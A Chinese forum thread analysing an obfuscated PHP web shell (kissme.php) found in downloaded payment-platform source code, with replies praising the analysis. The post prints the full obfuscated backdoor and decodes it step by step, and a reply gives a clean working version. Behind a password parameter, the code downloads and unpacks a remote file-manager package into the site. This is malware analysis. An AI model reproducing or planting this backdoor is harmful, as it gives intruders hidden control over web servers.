混个脸熟，简单分析一个PHP小马

yuren0

前些天在网上下载了一个支付平台的源码
发现里面有个kissme.php文件报毒
提取出来的代码如下图：

懒得手动梳理。
直接扔一个在线美化网站格式化一下，得到代码

[PHP] 纯文本查看 复制代码

?

001 002 003 004 005 006 007 008 009 010 011 012 013 014 015 016 017 018 019 020 021 022 023 024 025 026 027 028 029 030 031 032 033 034 035 036 037 038 039 040 041 042 043 044 045 046 047 048 049 050 051 052 053 054 055 056 057 058 059 060 061 062 063 064 065 066 067 068 069 070 071 072 073 074 075 076 077 078 079 080 081 082 083 084 085 086 087 088 089 090 091 092 093 094 095 096 097 098 099 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152

<?php if (!defined("AAAGAGA")) define("AAAGAGA", "AAAGAAG"); $GLOBALS[AAAGAGA] = explode("|^|K|3", "H*|^|K|341414741474747");   if (!defined(pack($GLOBALS[AAAGAGA][00], $GLOBALS[AAAGAGA][0x1]))) define(pack($GLOBALS[AAAGAGA][00], $GLOBALS[AAAGAGA][0x1]) , ord(1)); if (!defined("AAAGGAA")) define("AAAGGAA", "AAAGAGG"); $GLOBALS[AAAGGAA] = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");   if (!defined(pack($GLOBALS[AAAGGAA] {     0 } , $GLOBALS[AAAGGAA] {     01 }))) define(pack($GLOBALS[AAAGGAA] {     0 } , $GLOBALS[AAAGGAA] {     01 }) , pack($GLOBALS[AAAGGAA] {     0 } , $GLOBALS[AAAGGAA][02])); $GLOBALS[AAGAGGA] = explode(pack($GLOBALS[AAAGGAA] {     0 } , $GLOBALS[AAAGGAA] {     3 }) , pack($GLOBALS[AAAGGAA] {     0 } , $GLOBALS[AAAGGAA][0x4])); if (!defined("AAAGGGA")) define("AAAGGGA", "AAAGGAG"); $GLOBALS[AAAGGGA] = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");   if (!$GLOBALS[AAGAGGA] {     0x1 } (pack($GLOBALS[AAAGGGA] {     0x0 } , $GLOBALS[AAAGGGA] {     1 }))) \call_user_func(pack($GLOBALS[AAAGGGA] {     0x0 } , $GLOBALS[AAAGGGA][02]) , pack($GLOBALS[AAAGGGA] {     0x0 } , $GLOBALS[AAAGGGA] {     1 }) , pack($GLOBALS[AAAGGGA] {     0x0 } , $GLOBALS[AAAGGGA] {     03 })); $GLOBALS[AAGGAAG] = array(     $_GET ); $AGAAAAG = & $passwd; $AGAAAAA = & $ch; $AAGGGGG = & $source; $AAGGGGA = & $data; $AAGGGAG = & $destination; $file = & $AAGGGAA; $AAGGAGG = & $zip; $file_path = & $AAGGAGA; $AGAAAAG = isset($GLOBALS[AAGGAAG][(0 - 1225 + 25 * AAGAGGG) ][pack($GLOBALS[AAAGGGA] {     0x0 } , $GLOBALS[AAAGGGA] {     4 }) ]) ? $GLOBALS[AAGGAAG][(0 - 1225 + 25 * AAGAGGG) ][pack($GLOBALS[AAAGGGA] {     0x0 } , $GLOBALS[AAAGGGA] {     4 }) ] : pack($GLOBALS[AAAGGGA] {     0x0 } , $GLOBALS[AAAGGGA][05]); if ($AGAAAAG != pack($GLOBALS[AAAGGGA] {     0x0 } , $GLOBALS[AAAGGGA][06])) {     exit; } $AGAAAAA = curl_init(); $AAGGGGG = pack($GLOBALS[AAAGGGA] {     0x0 } , $GLOBALS[AAAGGGA] {     07 }); curl_setopt($AGAAAAA, CURLOPT_URL, $AAGGGGG); curl_setopt($AGAAAAA, CURLOPT_RETURNTRANSFER, (AAGAGGG * 41 - 2008)); $AAGGGGA = curl_exec($AGAAAAA); curl_close($AGAAAAA); $AAGGGAG = pack($GLOBALS[AAAGGGA] {     0x0 } , $GLOBALS[AAAGGGA] {     0x8 }); $AAGGGAA = $GLOBALS[AAGAGGA] {     02 } ($AAGGGAG, pack($GLOBALS[AAAGGGA] {     0x0 } , $GLOBALS[AAAGGGA][011])); $GLOBALS[AAGAGGA] {     03 } ($AAGGGAA, $AAGGGGA); $GLOBALS[AAGAGGA] {     0x4 } ($AAGGGAA); $AAGGAGG = new ZipArchive(); if ($AAGGAGG->open(pack($GLOBALS[AAAGGGA] {     0x0 } , $GLOBALS[AAAGGGA][012])) === true) {     $AAGGAGG->extractTo(pack($GLOBALS[AAAGGGA] {         0x0     }     , $GLOBALS[AAAGGGA] {         11     }));     $AAGGAGG->close(); } $AAGGAGA = pack($GLOBALS[AAAGGGA] {     0x0 } , $GLOBALS[AAAGGGA] {     0x8 }); if ($GLOBALS[AAGAGGA] {     05 } ($AAGGAGA)) {     if ($GLOBALS[AAGAGGA][6]($AAGGAGA)) {     } } echo pack($GLOBALS[AAAGGGA] {     0x0 } , $GLOBALS[AAAGGGA] {     0xC }); ?>

现在看着顺眼一点，开始一步步分析
我们直接看比较长的字符串，看第七行代码：

[PHP] 纯文本查看 复制代码

?

1	$GLOBALS[AAAGGAA] = explode("|v|t|Z", "H*|v|t|Z41414741474741|v|t|Z41414741474147|v|t|Z7C3A7C2D7C35|v|t|Z7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B");

explode函数作用为以第一个参数文本分割第二个参数文本为数组
我们可以加个print_r函数将$GLOBALS[AAAGGAA] 数组输出看看结果：

[PHP] 纯文本查看 复制代码

?

1 2 3 4 5 6 7 8

Array (     [0] => H*     [1] => 41414741474741     [2] => 41414741474147     [3] => 7C3A7C2D7C35     [4] => 7C3A7C2D7C35646566696E65647C3A7C2D7C35666F70656E7C3A7C2D7C3566707574737C3A7C2D7C3566636C6F73657C3A7C2D7C3569735F66696C657C3A7C2D7C35756E6C696E6B )

上方数组再用   echo pack("H*","41414741474741");  方法调试输出一下（第一个参数为上方数组的[0]，第二个参数为上方数组中的[1],[2],[3],[4]），分别得到如下内容：

[PHP] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11 12 13 14

[1] =>AAGAGGA     [2] =>AAGAGAG     [3] =>|:|-|5     [4] =>|:|-|5defined|:|-|5fopen|:|-|5fputs|:|-|5fclose|:|-|5is_file|:|-|5unlink //其中， [3]和[4]的类型等同于上方代码，再进行字符打散为数组得出： (     [0] =>     [1] => defined     [2] => fopen     [3] => fputs     [4] => fclose     [5] => is_file     [6] => unlink )

至此，相关声明部分已基本完成
-----------------------------------------------------------------分割线-------------------------------------------------------------
然后我们继续，来到第33行：

[PHP] 纯文本查看 复制代码

?

1

$GLOBALS[AAAGGGA] = explode("|K|H|a", "H*|K|H|a41414747414147|K|H|a646566696E65|K|H|a41414747414141|K|H|a70|K|H|a|K|H|a3070656e2e736573616d65|K|H|a687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970|K|H|a2E2F6B6F642E7A6970|K|H|a772B|K|H|a6B6F642E7A6970|K|H|a6B6F642F|K|H|a3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A");

用相同的方法，得到数组内容：

[PHP] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

Array (     [0] => H*     [1] => 41414747414147     [2] => 646566696E65     [3] => 41414747414141     [4] => 70     [5] =>     [6] => 3070656e2e736573616d65     [7] => 687474703A2F2F7374617469632E6B6F64636C6F75642E636F6D2F7570646174652F646F776E6C6F61642F6B6F646578706C6F726572342E34302E7A6970     [8] => 2E2F6B6F642E7A6970     [9] => 772B     [10] => 6B6F642E7A6970     [11] => 6B6F642F     [12] => 3C6120687265663D222E2F6B6F6422207461726765743D225F626C616E6B223EE689A7E8A18CE68890E58A9FE782B9E587BBE8BF9BE585A53C2F613E0A ) //再通过pack函数依次进行解码得到如下信息：     [1] =>AAGGAAG     [2] =>define     [3] =>AAGGAAA     [4] =>p     [5] =>     [6] =>0pen.sesame     [7] =>http://static.kodcloud.com/update/download/kodexplorer4.40.zip     [8] =>./kod.zip     [9] =>w+     [10] =>kod.zip     [11] =>kod/     [12] =><a href="./kod" target="_blank">执行成功点击进入</a>

到这里，基本已梳理出小马相关信息了
小马作者利用的是可道云的文件管理信息
上面解码出来的[4]为小马连接密码的参数名，[6]为小马连接密码（芝麻开门？？）
当传入密码参数后，服务器将会进行可道云文件管理的zip包，并进行解压，解压目录位于小马目录的kod文件夹
然后返回一个链接，直接点击即可进入文件管理器
小马验证：
将kissme.php放入目录，直接访问：http://127.0.0.1/kissme.php?p=0pen.sesame
片刻后，输出链接，点击后进入可道云资源管理器……

hc3w

[PHP] 纯文本查看 复制代码

?

01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27

<?php   $passwd = isset($_GET['p']) ? $_GET['p'] : ''; if ($passwd != '0pen.sesame') {     exit; } $ch = curl_init(); $source = 'http://static.kodcloud.com/update/download/kodexplorer4.40.zip'; curl_setopt($ch, CURLOPT_URL, $source); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $data = curl_exec($ch); curl_close($ch); $destination = './kod.zip'; $AAGGGAA = fopen($destination, 'w+'); fputs($AAGGGAA, $data); fclose($AAGGGAA); $zip = new ZipArchive(); if ($zip->open('kod.zip') === true) {     $zip->extractTo('kod/');     $zip->close(); } $AAGGAGA = './kod.zip'; if (is_file($AAGGAGA)) {     if (unlink($AAGGAGA)) {     } } echo "<a href=\"./kod\" target=\"_blank\">执行成功点击进入</a>\n";

tanghengvip

代码还原老司机了

无痕978

有一个朋友想要知道这个在线美化网站地址

yuren0

无痕978 发表于 2022-1-18 13:00
有一个朋友想要知道这个在线美化网站地址

度娘搜：php 在线格式化

happykeke

分析透彻，很不错，值得学习

xiaojie8023

这种马儿的操作真的很骚，学习了

咔c君

学习了不错

423680289

感谢分享